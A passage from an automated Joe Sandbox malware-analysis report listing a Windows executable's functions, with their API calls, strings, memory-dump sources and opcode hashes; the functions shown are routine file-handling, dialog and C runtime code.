                                                                                                                    • SetFocus.USER32(00000000), ref: 0059C2E7
                                                                                                                    • SetDlgItemTextW.USER32(?,00000065,?), ref: 0059C321
                                                                                                                    • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0059C358
                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0059C36E
                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0059C38C
                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0059C39C
                                                                                                                    • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0059C3B8
                                                                                                                    • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0059C3D4
                                                                                                                    • _swprintf.LIBCMT ref: 0059C404
                                                                                                                      • Part of subcall function 00584092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 005840A5
                                                                                                                    • SetDlgItemTextW.USER32(?,0000006A,?), ref: 0059C417
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0059C41E
                                                                                                                    • _swprintf.LIBCMT ref: 0059C477
                                                                                                                    • SetDlgItemTextW.USER32(?,00000068,?), ref: 0059C48A
                                                                                                                    • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0059C4A7
                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0059C4C7
                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0059C4D7
                                                                                                                    • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0059C4F1
                                                                                                                    • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0059C509
                                                                                                                    • _swprintf.LIBCMT ref: 0059C535
                                                                                                                    • SetDlgItemTextW.USER32(?,0000006B,?), ref: 0059C548
                                                                                                                    • _swprintf.LIBCMT ref: 0059C59C
                                                                                                                    • SetDlgItemTextW.USER32(?,00000069,?), ref: 0059C5AF
                                                                                                                      • Part of subcall function 0059AF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0059AF35
                                                                                                                      • Part of subcall function 0059AF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,005BE72C,?,?), ref: 0059AF84
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                                                                                    • String ID: %s %s$%s %s %s$PY$REPLACEFILEDLG
                                                                                                                    • API String ID: 797121971-1026030046
                                                                                                                    • Opcode ID: a9ea698409f2eaf29530a9b0ca0dc9017c3320e5125f9bf21494e81054038756
                                                                                                                    • Instruction ID: 903b261c0940f4ad739454d499f370e63f255b2df066c016cb5d1d8e41d158f8
                                                                                                                    • Opcode Fuzzy Hash: a9ea698409f2eaf29530a9b0ca0dc9017c3320e5125f9bf21494e81054038756
                                                                                                                    • Instruction Fuzzy Hash: 21919572148349BBD721ABA0DC8DFFB7FACFB99700F004819F685D6081D771A6089B62
                                                                                                                    Function 00586FAA Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 328fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00586FAA
                                                                                                                    • _wcslen.LIBCMT ref: 00587013
                                                                                                                    • _wcslen.LIBCMT ref: 00587084
                                                                                                                      • Part of subcall function 00587A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00587AAB
                                                                                                                      • Part of subcall function 00587A9C: GetLastError.KERNEL32 ref: 00587AF1
                                                                                                                      • Part of subcall function 00587A9C: CloseHandle.KERNEL32(?), ref: 00587B00
                                                                                                                      • Part of subcall function 0058A1E0: DeleteFileW.KERNELBASE(000000FF,?,?,0058977F,?,?,005895CF,?,?,?,?,?,005B2641,000000FF), ref: 0058A1F1
                                                                                                                      • Part of subcall function 0058A1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0058977F,?,?,005895CF,?,?,?,?,?,005B2641), ref: 0058A21F
                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00587139
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00587155
                                                                                                                    • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00587298
                                                                                                                      • Part of subcall function 00589DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,005873BC,?,?,?,00000000), ref: 00589DBC
                                                                                                                      • Part of subcall function 00589DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00589E70
                                                                                                                      • Part of subcall function 00589620: CloseHandle.KERNELBASE(000000FF,?,?,005895D6,?,?,?,?,?,005B2641,000000FF), ref: 0058963B
                                                                                                                      • Part of subcall function 0058A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0058A325,?,?,?,0058A175,?,00000001,00000000,?,?), ref: 0058A501
                                                                                                                      • Part of subcall function 0058A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0058A325,?,?,?,0058A175,?,00000001,00000000,?,?), ref: 0058A532
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
                                                                                                                    • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                                    • API String ID: 3983180755-3508440684
                                                                                                                    • Opcode ID: 175531fe5d2d87e9a2af3080ee35c40a2f025f8c4d05e36a6b1bb42ed1fb98f5
                                                                                                                    • Instruction ID: e46bb1c80015b565650059cb29772e222bbb40ec5570974fbce553c38d5b90ae
                                                                                                                    • Opcode Fuzzy Hash: 175531fe5d2d87e9a2af3080ee35c40a2f025f8c4d05e36a6b1bb42ed1fb98f5
                                                                                                                    • Instruction Fuzzy Hash: 53C1C571904609AADB21FB74CC49FEEBBA8BF48300F144959FD56B7182DB70EA44CB61
                                                                                                                    Function 005AD8EE Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __floor_pentium4
                                                                                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                    • API String ID: 4168288129-2761157908
                                                                                                                    • Opcode ID: 07d6795b00cb0f2455ca59c9b7e782c107fe7552cf808e66a533956a8eabeabc
                                                                                                                    • Instruction ID: e3fa30358afb496d4cb9b7bcd9aa6621b95071dd54eae1fedb3cf637d2d34b00
                                                                                                                    • Opcode Fuzzy Hash: 07d6795b00cb0f2455ca59c9b7e782c107fe7552cf808e66a533956a8eabeabc
                                                                                                                    • Instruction Fuzzy Hash: 9CC25B71E042298FDB25DE289D457EEBBB9FB49304F1445EAD40EE7240E774AE818F50
                                                                                                                    Function 005832F7 Relevance: 9.4, APIs: 2, Strings: 3, Instructions: 608COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog_swprintf
                                                                                                                    • String ID: CMT$h%u$hc%u
                                                                                                                    • API String ID: 146138363-3282847064
                                                                                                                    • Opcode ID: 3be596081e119989b72730cccd12ecdaa4814790e8a8fe77ad4c513331e1073a
                                                                                                                    • Instruction ID: 3a03843a81e67c168b3834e138e14fe02f893ebe63026d2538774bbe30e28bca
                                                                                                                    • Opcode Fuzzy Hash: 3be596081e119989b72730cccd12ecdaa4814790e8a8fe77ad4c513331e1073a
                                                                                                                    • Instruction Fuzzy Hash: 3A32D4715102859FDF14EF74C89AAE93FA5BF55700F04047DFD8AAB282DB74AA49CB20
                                                                                                                    Function 0058286B Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 798COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00582874
                                                                                                                    • _strlen.LIBCMT ref: 00582E3F
                                                                                                                      • Part of subcall function 005902BA: __EH_prolog.LIBCMT ref: 005902BF
                                                                                                                      • Part of subcall function 00591B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0058BAE9,00000000,?,?,?,00010448), ref: 00591BA0
                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00582F91
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                                                                                                    • String ID: CMT
                                                                                                                    • API String ID: 1206968400-2756464174
                                                                                                                    • Opcode ID: a071e8945c85c457d28d39a23e66ff9dfd6b0b0fc0233fdd33045504b39b9274
                                                                                                                    • Instruction ID: a92dcbf11fe3a659bd07d388734cb7890c9d6f7d3a22fcb3b11fef5f59149468
                                                                                                                    • Opcode Fuzzy Hash: a071e8945c85c457d28d39a23e66ff9dfd6b0b0fc0233fdd33045504b39b9274
                                                                                                                    • Instruction Fuzzy Hash: 0162F8716006458FDF19EF34C88A6EA7FA1FF54300F08457EEC9AAB282DB759945CB60
                                                                                                                    Function 0059F838 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0059F844
                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 0059F910
                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0059F930
                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 0059F93A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 254469556-0
                                                                                                                    • Opcode ID: 0322f02dc7d4c3987e9ec1a6bc41974f5d5b5d622d47e9b5fefdc864ae628af2
                                                                                                                    • Instruction ID: f078aedd4532faa9261f52de5ba3588e894619d6b00c4f8b3aba1033de9aa95b
                                                                                                                    • Opcode Fuzzy Hash: 0322f02dc7d4c3987e9ec1a6bc41974f5d5b5d622d47e9b5fefdc864ae628af2
                                                                                                                    • Instruction Fuzzy Hash: 53311875D052199BDF20DFA4D9897CCBBB8BF08304F1041AAE40CAB250EB719B84DF44
                                                                                                                    Function 0059E6A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • VirtualQuery.KERNEL32(80000000,0059E5E8,0000001C,0059E7DD,00000000,?,?,?,?,?,?,?,0059E5E8,00000004,005E1CEC,0059E86D), ref: 0059E6B4
                                                                                                                    • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,0059E5E8,00000004,005E1CEC,0059E86D), ref: 0059E6CF
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InfoQuerySystemVirtual
                                                                                                                    • String ID: D
                                                                                                                    • API String ID: 401686933-2746444292
                                                                                                                    • Opcode ID: 33b2d6537cdcae1ebdfd8e562fd69785d5a86a58888c998b8b699d032cdc671e
                                                                                                                    • Instruction ID: a6091fa4e770d5822c97728dd2d53fcca5affc446ccd9d6f2a6da7a12b553da1
                                                                                                                    • Opcode Fuzzy Hash: 33b2d6537cdcae1ebdfd8e562fd69785d5a86a58888c998b8b699d032cdc671e
                                                                                                                    • Instruction Fuzzy Hash: 9001D432600109ABDF14DF69DC4AADD7BAAFFC4324F0CC224ED19E6150E734E9058680
                                                                                                                    Function 005A8EBD Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 005A8FB5
                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 005A8FBF
                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 005A8FCC
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3906539128-0
                                                                                                                    • Opcode ID: 7079d20b85cd8759b7112fa15c7625b7a24a32a998350e750c4a659acf2a739a
                                                                                                                    • Instruction ID: 1c74c2c0733cc56554d14d7d91e29541c53b11429925c1dc5ae952d182d38cd0
                                                                                                                    • Opcode Fuzzy Hash: 7079d20b85cd8759b7112fa15c7625b7a24a32a998350e750c4a659acf2a739a
                                                                                                                    • Instruction Fuzzy Hash: B831E77590121DABCB21DF28DC89B9CBBB8BF48310F5042EAE41CA7250EB309F858F44
                                                                                                                    Function 005AD440 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                                                                                    • Instruction ID: 1380033ec596cc15bd7e563750d358d507b2ebf9e50754c0ccc9a687d2c4afce
                                                                                                                    • Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                                                                                    • Instruction Fuzzy Hash: F9022B71E002199BDF18DFA9C8806ADBBF1FF89314F258169D81AE7681D735AE41CB90
                                                                                                                    Function 0059AF0F Relevance: 3.0, APIs: 2, Instructions: 45COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0059AF35
                                                                                                                    • GetNumberFormatW.KERNEL32(00000400,00000000,?,005BE72C,?,?), ref: 0059AF84
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FormatInfoLocaleNumber
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2169056816-0
                                                                                                                    • Opcode ID: a75f17ba61d3cc604332d4ed2f3d132e45d46f76c531ff174bd4f862af66c4a6
                                                                                                                    • Instruction ID: 1cb9aab9fae5df0e80fd6342bf24fdf98d6775cde27eb468297d5d73d3c10e13
                                                                                                                    • Opcode Fuzzy Hash: a75f17ba61d3cc604332d4ed2f3d132e45d46f76c531ff174bd4f862af66c4a6
                                                                                                                    • Instruction Fuzzy Hash: D901717A110348AADB109F64DC49FDA7BBCFF19710F005422FA05A71A0D774A929DBA5
                                                                                                                    Function 00586C74 Relevance: 3.0, APIs: 2, Instructions: 16windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetLastError.KERNEL32(00586DDF,00000000,00000400), ref: 00586C74
                                                                                                                    • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00586C95
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorFormatLastMessage
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3479602957-0
                                                                                                                    • Opcode ID: 07629942e12914b5d157724251f59be0a26aae833a5789ccb56165eb08d8f569
                                                                                                                    • Instruction ID: 8e35da4b00d90412e8c8d358c374cd73c309e5400bd99ef732960f88e7973972
                                                                                                                    • Opcode Fuzzy Hash: 07629942e12914b5d157724251f59be0a26aae833a5789ccb56165eb08d8f569
                                                                                                                    • Instruction Fuzzy Hash: 0BD0A774344304BFFB402B214C0AF1A3F58BF50B42F14C4047740F40E0D670A814B714
                                                                                                                    Function 005B19F4 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,005B19EF,?,?,00000008,?,?,005B168F,00000000), ref: 005B1C21
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionRaise
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3997070919-0
                                                                                                                    • Opcode ID: 5caae80e75c50a8fe69054a4138f965f35e86964762755e9626ac02b149b833f
                                                                                                                    • Instruction ID: 48a012425913037ecb87d54ef1008e035358be13f3172d79d0a1510ec3d0882c
                                                                                                                    • Opcode Fuzzy Hash: 5caae80e75c50a8fe69054a4138f965f35e86964762755e9626ac02b149b833f
                                                                                                                    • Instruction Fuzzy Hash: F3B13A31210A089FD759CF28C4AABA57FE0FF45364F658658E89ACF2A1C335ED91CB44
                                                                                                                    Function 0059F654 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0059F66A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
